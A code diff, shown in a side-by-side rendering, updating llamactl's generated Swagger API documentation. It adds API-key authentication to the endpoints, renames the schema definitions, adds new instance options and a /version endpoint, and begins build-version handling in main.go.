import "github.com/swaggo/swag" import "github.com/swaggo/swag"
@@ -21,6 +21,11 @@ const docTemplate = `{
"paths": { "paths": {
"/instances": { "/instances": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of all instances managed by the server", "description": "Returns a list of all instances managed by the server",
"tags": [ "tags": [
"instances" "instances"
@@ -32,7 +37,7 @@ const docTemplate = `{
"schema": { "schema": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
} }
}, },
@@ -47,6 +52,11 @@ const docTemplate = `{
}, },
"/instances/{name}": { "/instances/{name}": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the details of a specific instance by name", "description": "Returns the details of a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -65,7 +75,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Instance details", "description": "Instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -83,6 +93,11 @@ const docTemplate = `{
} }
}, },
"put": { "put": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Updates the configuration of a specific instance by name", "description": "Updates the configuration of a specific instance by name",
"consumes": [ "consumes": [
"application/json" "application/json"
@@ -105,7 +120,7 @@ const docTemplate = `{
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -113,7 +128,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Updated instance details", "description": "Updated instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -131,6 +146,11 @@ const docTemplate = `{
} }
}, },
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Creates a new instance with the provided configuration options", "description": "Creates a new instance with the provided configuration options",
"consumes": [ "consumes": [
"application/json" "application/json"
@@ -153,7 +173,7 @@ const docTemplate = `{
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -161,7 +181,7 @@ const docTemplate = `{
"201": { "201": {
"description": "Created instance details", "description": "Created instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -179,6 +199,11 @@ const docTemplate = `{
} }
}, },
"delete": { "delete": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Stops and removes a specific instance by name", "description": "Stops and removes a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -214,6 +239,11 @@ const docTemplate = `{
}, },
"/instances/{name}/logs": { "/instances/{name}/logs": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the logs from a specific instance by name with optional line limit", "description": "Returns the logs from a specific instance by name with optional line limit",
"tags": [ "tags": [
"instances" "instances"
@@ -258,6 +288,11 @@ const docTemplate = `{
}, },
"/instances/{name}/proxy": { "/instances/{name}/proxy": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Forwards HTTP requests to the llama-server instance running on a specific port", "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
"tags": [ "tags": [
"instances" "instances"
@@ -297,6 +332,11 @@ const docTemplate = `{
} }
}, },
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Forwards HTTP requests to the llama-server instance running on a specific port", "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
"tags": [ "tags": [
"instances" "instances"
@@ -338,6 +378,11 @@ const docTemplate = `{
}, },
"/instances/{name}/restart": { "/instances/{name}/restart": {
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Restarts a specific instance by name", "description": "Restarts a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -356,7 +401,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Restarted instance details", "description": "Restarted instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -376,6 +421,11 @@ const docTemplate = `{
}, },
"/instances/{name}/start": { "/instances/{name}/start": {
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Starts a specific instance by name", "description": "Starts a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -394,7 +444,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Started instance details", "description": "Started instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -414,6 +464,11 @@ const docTemplate = `{
}, },
"/instances/{name}/stop": { "/instances/{name}/stop": {
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Stops a specific instance by name", "description": "Stops a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -432,7 +487,7 @@ const docTemplate = `{
"200": { "200": {
"description": "Stopped instance details", "description": "Stopped instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -452,6 +507,11 @@ const docTemplate = `{
}, },
"/server/devices": { "/server/devices": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server", "description": "Returns a list of available devices for the llama server",
"tags": [ "tags": [
"server" "server"
@@ -475,6 +535,11 @@ const docTemplate = `{
}, },
"/server/help": { "/server/help": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command", "description": "Returns the help text for the llama server command",
"tags": [ "tags": [
"server" "server"
@@ -498,6 +563,11 @@ const docTemplate = `{
}, },
"/server/version": { "/server/version": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command", "description": "Returns the version of the llama server command",
"tags": [ "tags": [
"server" "server"
@@ -521,7 +591,12 @@ const docTemplate = `{
}, },
"/v1/": { "/v1/": {
"post": { "post": {
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body", "security": [
{
"ApiKeyAuth": []
}
],
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the ` + "`" + `Authorization` + "`" + ` header.",
"consumes": [ "consumes": [
"application/json" "application/json"
], ],
@@ -550,6 +625,11 @@ const docTemplate = `{
}, },
"/v1/models": { "/v1/models": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of instances in a format compatible with OpenAI API", "description": "Returns a list of instances in a format compatible with OpenAI API",
"tags": [ "tags": [
"openai" "openai"
@@ -559,7 +639,35 @@ const docTemplate = `{
"200": { "200": {
"description": "List of OpenAI-compatible instances", "description": "List of OpenAI-compatible instances",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse" "$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
} }
}, },
"500": { "500": {
@@ -573,7 +681,7 @@ const docTemplate = `{
} }
}, },
"definitions": { "definitions": {
"llamactl.CreateInstanceOptions": { "instance.CreateInstanceOptions": {
"type": "object", "type": "object",
"properties": { "properties": {
"alias": { "alias": {
@@ -671,7 +779,6 @@ const docTemplate = `{
"type": "string" "type": "string"
}, },
"draft_max": { "draft_max": {
"description": "Speculative decoding params",
"type": "integer" "type": "integer"
}, },
"draft_min": { "draft_min": {
@@ -777,6 +884,10 @@ const docTemplate = `{
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -875,7 +986,7 @@ const docTemplate = `{
"type": "boolean" "type": "boolean"
}, },
"no_context_shift": { "no_context_shift": {
"description": "Server/Example-specific params", "description": "Example-specific params",
"type": "boolean" "type": "boolean"
}, },
"no_escape": { "no_escape": {
@@ -911,6 +1022,10 @@ const docTemplate = `{
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -947,10 +1062,10 @@ const docTemplate = `{
"presence_penalty": { "presence_penalty": {
"type": "number" "type": "number"
}, },
"priority": { "prio": {
"type": "integer" "type": "integer"
}, },
"priority_batch": { "prio_batch": {
"type": "integer" "type": "integer"
}, },
"props": { "props": {
@@ -971,8 +1086,7 @@ const docTemplate = `{
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1021,7 +1135,7 @@ const docTemplate = `{
"ssl_key_file": { "ssl_key_file": {
"type": "string" "type": "string"
}, },
"temperature": { "temp": {
"type": "number" "type": "number"
}, },
"tensor_split": { "tensor_split": {
@@ -1087,7 +1201,20 @@ const docTemplate = `{
} }
} }
}, },
"llamactl.Instance": { "instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1097,13 +1224,17 @@ const docTemplate = `{
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },
"llamactl.OpenAIInstance": { "server.OpenAIInstance": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1120,13 +1251,13 @@ const docTemplate = `{
} }
} }
}, },
"llamactl.OpenAIListInstancesResponse": { "server.OpenAIListInstancesResponse": {
"type": "object", "type": "object",
"properties": { "properties": {
"data": { "data": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.OpenAIInstance" "$ref": "#/definitions/server.OpenAIInstance"
} }
}, },
"object": { "object": {

View File

@@ -14,6 +14,11 @@
"paths": { "paths": {
"/instances": { "/instances": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of all instances managed by the server", "description": "Returns a list of all instances managed by the server",
"tags": [ "tags": [
"instances" "instances"
@@ -25,7 +30,7 @@
"schema": { "schema": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
} }
}, },
@@ -40,6 +45,11 @@
}, },
"/instances/{name}": { "/instances/{name}": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the details of a specific instance by name", "description": "Returns the details of a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -58,7 +68,7 @@
"200": { "200": {
"description": "Instance details", "description": "Instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -76,6 +86,11 @@
} }
}, },
"put": { "put": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Updates the configuration of a specific instance by name", "description": "Updates the configuration of a specific instance by name",
"consumes": [ "consumes": [
"application/json" "application/json"
@@ -98,7 +113,7 @@
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -106,7 +121,7 @@
"200": { "200": {
"description": "Updated instance details", "description": "Updated instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -124,6 +139,11 @@
} }
}, },
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Creates a new instance with the provided configuration options", "description": "Creates a new instance with the provided configuration options",
"consumes": [ "consumes": [
"application/json" "application/json"
@@ -146,7 +166,7 @@
"in": "body", "in": "body",
"required": true, "required": true,
"schema": { "schema": {
"$ref": "#/definitions/llamactl.CreateInstanceOptions" "$ref": "#/definitions/instance.CreateInstanceOptions"
} }
} }
], ],
@@ -154,7 +174,7 @@
"201": { "201": {
"description": "Created instance details", "description": "Created instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -172,6 +192,11 @@
} }
}, },
"delete": { "delete": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Stops and removes a specific instance by name", "description": "Stops and removes a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -207,6 +232,11 @@
}, },
"/instances/{name}/logs": { "/instances/{name}/logs": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the logs from a specific instance by name with optional line limit", "description": "Returns the logs from a specific instance by name with optional line limit",
"tags": [ "tags": [
"instances" "instances"
@@ -251,6 +281,11 @@
}, },
"/instances/{name}/proxy": { "/instances/{name}/proxy": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Forwards HTTP requests to the llama-server instance running on a specific port", "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
"tags": [ "tags": [
"instances" "instances"
@@ -290,6 +325,11 @@
} }
}, },
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Forwards HTTP requests to the llama-server instance running on a specific port", "description": "Forwards HTTP requests to the llama-server instance running on a specific port",
"tags": [ "tags": [
"instances" "instances"
@@ -331,6 +371,11 @@
}, },
"/instances/{name}/restart": { "/instances/{name}/restart": {
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Restarts a specific instance by name", "description": "Restarts a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -349,7 +394,7 @@
"200": { "200": {
"description": "Restarted instance details", "description": "Restarted instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -369,6 +414,11 @@
}, },
"/instances/{name}/start": { "/instances/{name}/start": {
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Starts a specific instance by name", "description": "Starts a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -387,7 +437,7 @@
"200": { "200": {
"description": "Started instance details", "description": "Started instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -407,6 +457,11 @@
}, },
"/instances/{name}/stop": { "/instances/{name}/stop": {
"post": { "post": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Stops a specific instance by name", "description": "Stops a specific instance by name",
"tags": [ "tags": [
"instances" "instances"
@@ -425,7 +480,7 @@
"200": { "200": {
"description": "Stopped instance details", "description": "Stopped instance details",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.Instance" "$ref": "#/definitions/instance.Process"
} }
}, },
"400": { "400": {
@@ -445,6 +500,11 @@
}, },
"/server/devices": { "/server/devices": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of available devices for the llama server", "description": "Returns a list of available devices for the llama server",
"tags": [ "tags": [
"server" "server"
@@ -468,6 +528,11 @@
}, },
"/server/help": { "/server/help": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the help text for the llama server command", "description": "Returns the help text for the llama server command",
"tags": [ "tags": [
"server" "server"
@@ -491,6 +556,11 @@
}, },
"/server/version": { "/server/version": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llama server command", "description": "Returns the version of the llama server command",
"tags": [ "tags": [
"server" "server"
@@ -514,7 +584,12 @@
}, },
"/v1/": { "/v1/": {
"post": { "post": {
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body", "security": [
{
"ApiKeyAuth": []
}
],
"description": "Handles all POST requests to /v1/*, routing to the appropriate instance based on the request body. Requires API key authentication via the `Authorization` header.",
"consumes": [ "consumes": [
"application/json" "application/json"
], ],
@@ -543,6 +618,11 @@
}, },
"/v1/models": { "/v1/models": {
"get": { "get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns a list of instances in a format compatible with OpenAI API", "description": "Returns a list of instances in a format compatible with OpenAI API",
"tags": [ "tags": [
"openai" "openai"
@@ -552,7 +632,35 @@
"200": { "200": {
"description": "List of OpenAI-compatible instances", "description": "List of OpenAI-compatible instances",
"schema": { "schema": {
"$ref": "#/definitions/llamactl.OpenAIListInstancesResponse" "$ref": "#/definitions/server.OpenAIListInstancesResponse"
}
},
"500": {
"description": "Internal Server Error",
"schema": {
"type": "string"
}
}
}
}
},
"/version": {
"get": {
"security": [
{
"ApiKeyAuth": []
}
],
"description": "Returns the version of the llamactl command",
"tags": [
"version"
],
"summary": "Get llamactl version",
"responses": {
"200": {
"description": "Version information",
"schema": {
"type": "string"
} }
}, },
"500": { "500": {
@@ -566,7 +674,7 @@
} }
}, },
"definitions": { "definitions": {
"llamactl.CreateInstanceOptions": { "instance.CreateInstanceOptions": {
"type": "object", "type": "object",
"properties": { "properties": {
"alias": { "alias": {
@@ -664,7 +772,6 @@
"type": "string" "type": "string"
}, },
"draft_max": { "draft_max": {
"description": "Speculative decoding params",
"type": "integer" "type": "integer"
}, },
"draft_min": { "draft_min": {
@@ -770,6 +877,10 @@
"host": { "host": {
"type": "string" "type": "string"
}, },
"idle_timeout": {
"description": "Idle timeout",
"type": "integer"
},
"ignore_eos": { "ignore_eos": {
"type": "boolean" "type": "boolean"
}, },
@@ -868,7 +979,7 @@
"type": "boolean" "type": "boolean"
}, },
"no_context_shift": { "no_context_shift": {
"description": "Server/Example-specific params", "description": "Example-specific params",
"type": "boolean" "type": "boolean"
}, },
"no_escape": { "no_escape": {
@@ -904,6 +1015,10 @@
"numa": { "numa": {
"type": "string" "type": "string"
}, },
"on_demand_start": {
"description": "On demand start",
"type": "boolean"
},
"override_kv": { "override_kv": {
"type": "array", "type": "array",
"items": { "items": {
@@ -940,10 +1055,10 @@
"presence_penalty": { "presence_penalty": {
"type": "number" "type": "number"
}, },
"priority": { "prio": {
"type": "integer" "type": "integer"
}, },
"priority_batch": { "prio_batch": {
"type": "integer" "type": "integer"
}, },
"props": { "props": {
@@ -964,8 +1079,7 @@
"reranking": { "reranking": {
"type": "boolean" "type": "boolean"
}, },
"restart_delay_seconds": { "restart_delay": {
"description": "RestartDelay duration in seconds",
"type": "integer" "type": "integer"
}, },
"rope_freq_base": { "rope_freq_base": {
@@ -1014,7 +1128,7 @@
"ssl_key_file": { "ssl_key_file": {
"type": "string" "type": "string"
}, },
"temperature": { "temp": {
"type": "number" "type": "number"
}, },
"tensor_split": { "tensor_split": {
@@ -1080,7 +1194,20 @@
} }
} }
}, },
"llamactl.Instance": { "instance.InstanceStatus": {
"type": "integer",
"enum": [
0,
1,
2
],
"x-enum-varnames": [
"Stopped",
"Running",
"Failed"
]
},
"instance.Process": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1090,13 +1217,17 @@
"name": { "name": {
"type": "string" "type": "string"
}, },
"running": { "status": {
"description": "Status", "description": "Status",
"type": "boolean" "allOf": [
{
"$ref": "#/definitions/instance.InstanceStatus"
}
]
} }
} }
}, },
"llamactl.OpenAIInstance": { "server.OpenAIInstance": {
"type": "object", "type": "object",
"properties": { "properties": {
"created": { "created": {
@@ -1113,13 +1244,13 @@
} }
} }
}, },
"llamactl.OpenAIListInstancesResponse": { "server.OpenAIListInstancesResponse": {
"type": "object", "type": "object",
"properties": { "properties": {
"data": { "data": {
"type": "array", "type": "array",
"items": { "items": {
"$ref": "#/definitions/llamactl.OpenAIInstance" "$ref": "#/definitions/server.OpenAIInstance"
} }
}, },
"object": { "object": {

View File

@@ -1,6 +1,6 @@
basePath: /api/v1 basePath: /api/v1
definitions: definitions:
llamactl.CreateInstanceOptions: instance.CreateInstanceOptions:
properties: properties:
alias: alias:
type: string type: string
@@ -66,7 +66,6 @@ definitions:
device_draft: device_draft:
type: string type: string
draft_max: draft_max:
description: Speculative decoding params
type: integer type: integer
draft_min: draft_min:
type: integer type: integer
@@ -137,6 +136,9 @@ definitions:
type: string type: string
host: host:
type: string type: string
idle_timeout:
description: Idle timeout
type: integer
ignore_eos: ignore_eos:
type: boolean type: boolean
jinja: jinja:
@@ -203,7 +205,7 @@ definitions:
no_cont_batching: no_cont_batching:
type: boolean type: boolean
no_context_shift: no_context_shift:
description: Server/Example-specific params description: Example-specific params
type: boolean type: boolean
no_escape: no_escape:
type: boolean type: boolean
@@ -227,6 +229,9 @@ definitions:
type: boolean type: boolean
numa: numa:
type: string type: string
on_demand_start:
description: On demand start
type: boolean
override_kv: override_kv:
items: items:
type: string type: string
@@ -251,9 +256,9 @@ definitions:
type: integer type: integer
presence_penalty: presence_penalty:
type: number type: number
priority: prio:
type: integer type: integer
priority_batch: prio_batch:
type: integer type: integer
props: props:
type: boolean type: boolean
@@ -267,8 +272,7 @@ definitions:
type: number type: number
reranking: reranking:
type: boolean type: boolean
restart_delay_seconds: restart_delay:
description: RestartDelay duration in seconds
type: integer type: integer
rope_freq_base: rope_freq_base:
type: number type: number
@@ -301,7 +305,7 @@ definitions:
type: string type: string
ssl_key_file: ssl_key_file:
type: string type: string
temperature: temp:
type: number type: number
tensor_split: tensor_split:
type: string type: string
@@ -345,18 +349,29 @@ definitions:
yarn_orig_ctx: yarn_orig_ctx:
type: integer type: integer
type: object type: object
llamactl.Instance: instance.InstanceStatus:
enum:
- 0
- 1
- 2
type: integer
x-enum-varnames:
- Stopped
- Running
- Failed
instance.Process:
properties: properties:
created: created:
description: Creation time description: Creation time
type: integer type: integer
name: name:
type: string type: string
running: status:
allOf:
- $ref: '#/definitions/instance.InstanceStatus'
description: Status description: Status
type: boolean
type: object type: object
llamactl.OpenAIInstance: server.OpenAIInstance:
properties: properties:
created: created:
type: integer type: integer
@@ -367,11 +382,11 @@ definitions:
owned_by: owned_by:
type: string type: string
type: object type: object
llamactl.OpenAIListInstancesResponse: server.OpenAIListInstancesResponse:
properties: properties:
data: data:
items: items:
$ref: '#/definitions/llamactl.OpenAIInstance' $ref: '#/definitions/server.OpenAIInstance'
type: array type: array
object: object:
type: string type: string
@@ -393,12 +408,14 @@ paths:
description: List of instances description: List of instances
schema: schema:
items: items:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
type: array type: array
"500": "500":
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: List all instances summary: List all instances
tags: tags:
- instances - instances
@@ -422,6 +439,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Delete an instance summary: Delete an instance
tags: tags:
- instances - instances
@@ -437,7 +456,7 @@ paths:
"200": "200":
description: Instance details description: Instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -446,6 +465,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Get details of a specific instance summary: Get details of a specific instance
tags: tags:
- instances - instances
@@ -464,12 +485,12 @@ paths:
name: options name: options
required: true required: true
schema: schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions' $ref: '#/definitions/instance.CreateInstanceOptions'
responses: responses:
"201": "201":
description: Created instance details description: Created instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid request body description: Invalid request body
schema: schema:
@@ -478,6 +499,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Create and start a new instance summary: Create and start a new instance
tags: tags:
- instances - instances
@@ -496,12 +519,12 @@ paths:
name: options name: options
required: true required: true
schema: schema:
$ref: '#/definitions/llamactl.CreateInstanceOptions' $ref: '#/definitions/instance.CreateInstanceOptions'
responses: responses:
"200": "200":
description: Updated instance details description: Updated instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -510,6 +533,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Update an instance's configuration summary: Update an instance's configuration
tags: tags:
- instances - instances
@@ -540,6 +565,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Get logs from a specific instance summary: Get logs from a specific instance
tags: tags:
- instances - instances
@@ -568,6 +595,8 @@ paths:
description: Instance is not running description: Instance is not running
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to a specific instance summary: Proxy requests to a specific instance
tags: tags:
- instances - instances
@@ -595,6 +624,8 @@ paths:
description: Instance is not running description: Instance is not running
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Proxy requests to a specific instance summary: Proxy requests to a specific instance
tags: tags:
- instances - instances
@@ -611,7 +642,7 @@ paths:
"200": "200":
description: Restarted instance details description: Restarted instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -620,6 +651,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Restart a running instance summary: Restart a running instance
tags: tags:
- instances - instances
@@ -636,7 +669,7 @@ paths:
"200": "200":
description: Started instance details description: Started instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -645,6 +678,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Start a stopped instance summary: Start a stopped instance
tags: tags:
- instances - instances
@@ -661,7 +696,7 @@ paths:
"200": "200":
description: Stopped instance details description: Stopped instance details
schema: schema:
$ref: '#/definitions/llamactl.Instance' $ref: '#/definitions/instance.Process'
"400": "400":
description: Invalid name format description: Invalid name format
schema: schema:
@@ -670,6 +705,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Stop a running instance summary: Stop a running instance
tags: tags:
- instances - instances
@@ -685,6 +722,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: List available devices for llama server summary: List available devices for llama server
tags: tags:
- server - server
@@ -700,6 +739,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Get help for llama server summary: Get help for llama server
tags: tags:
- server - server
@@ -715,6 +756,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: Get version of llama server summary: Get version of llama server
tags: tags:
- server - server
@@ -723,7 +766,8 @@ paths:
consumes: consumes:
- application/json - application/json
description: Handles all POST requests to /v1/*, routing to the appropriate description: Handles all POST requests to /v1/*, routing to the appropriate
instance based on the request body instance based on the request body. Requires API key authentication via the
`Authorization` header.
responses: responses:
"200": "200":
description: OpenAI response description: OpenAI response
@@ -735,6 +779,8 @@ paths:
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: OpenAI-compatible proxy endpoint summary: OpenAI-compatible proxy endpoint
tags: tags:
- openai - openai
@@ -746,12 +792,31 @@ paths:
"200": "200":
description: List of OpenAI-compatible instances description: List of OpenAI-compatible instances
schema: schema:
$ref: '#/definitions/llamactl.OpenAIListInstancesResponse' $ref: '#/definitions/server.OpenAIListInstancesResponse'
"500": "500":
description: Internal Server Error description: Internal Server Error
schema: schema:
type: string type: string
security:
- ApiKeyAuth: []
summary: List instances in OpenAI-compatible format summary: List instances in OpenAI-compatible format
tags: tags:
- openai - openai
/version:
get:
description: Returns the version of the llamactl command
responses:
"200":
description: Version information
schema:
type: string
"500":
description: Internal Server Error
schema:
type: string
security:
- ApiKeyAuth: []
summary: Get llamactl version
tags:
- version
swagger: "2.0" swagger: "2.0"

View File

@@ -2,11 +2,20 @@ package main
import ( import (
"fmt" "fmt"
llamactl "llamactl/pkg" "llamactl/pkg/config"
"llamactl/pkg/manager"
"llamactl/pkg/server"
"net/http" "net/http"
"os" "os"
"os/signal"
"syscall"
) )
// version is set at build time using -ldflags "-X main.version=1.0.0"
var version string = "unknown"
var commitHash string = "unknown"
var buildTime string = "unknown"
// @title llamactl API // @title llamactl API
// @version 1.0 // @version 1.0
// @description llamactl is a control server for managing Llama Server instances. // @description llamactl is a control server for managing Llama Server instances.
@@ -15,29 +24,76 @@ import (
// @basePath /api/v1 // @basePath /api/v1
func main() { func main() {
config, err := llamactl.LoadConfig("") // --version flag to print the version
if len(os.Args) > 1 && os.Args[1] == "--version" {
fmt.Printf("llamactl version: %s\n", version)
